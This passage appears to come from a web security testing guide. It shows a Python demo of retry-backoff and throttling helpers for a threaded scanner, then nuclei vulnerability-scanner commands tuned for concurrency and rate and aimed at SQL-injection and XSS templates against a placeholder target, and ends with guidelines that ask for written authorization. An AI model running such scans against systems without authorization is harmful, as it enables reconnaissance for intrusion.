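    """Exercise the helpers with a fixed 'now' and a fake clock, so nothing really sleeps."""
    now = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    fake = [0.0]                                     # fake monotonic clock advanced by fake sleep
    th = Throttle(10, clock=lambda: fake[0], sleep=lambda d: fake.__setitem__(0, fake[0] + d))
    return {
        "delta_seconds": retry_after_seconds({"Retry-After": "120"}),
        "http_date": retry_after_seconds({"Retry-After": "Mon, 01 Jan 2024 12:00:30 GMT"}, now=now),
        "no_header": backoff_seconds(429, {}, attempt=3),                 # 1 * 2**3
        "capped": backoff_seconds(503, {"Retry-After": "600"}, attempt=0),  # clamped to cap
        "not_retryable": backoff_seconds(500, {}, attempt=0),
        "throttle_delays": [round(th.wait(), 3) for _ in range(3)],
        "total_waited": round(th.waited, 3),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16} {value}")
```

In the threaded scanner, create one `Throttle` and call `wait()` immediately before each `session.get`; on a 429/503, call `backoff_seconds`, sleep for the result if it is not None, and re-queue the path with `attempt + 1`, giving up after a fixed number of attempts.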

Performance Optimization

# Tune concurrency (-c, default 25), hosts per batch (-bs) and rate cap (-rl) for large target lists;
# -t selects templates and does not control threads
nuclei -l targets.txt -c 50 -bs 50 -rl 300

# Start with a narrow template set, then widen
nuclei -u http://TARGET_URL -tags sqli
nuclei -u http://TARGET_URL -severity critical,high

# Use specific templates
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml

Guidelines

  • Always obtain written authorization, with scope and time window, before testing
  • Respect rate limits and server resources
  • Use appropriate tools for the target
  • Document findings properly (command line, timestamp, raw request and response)
  • Follow responsible disclosure practices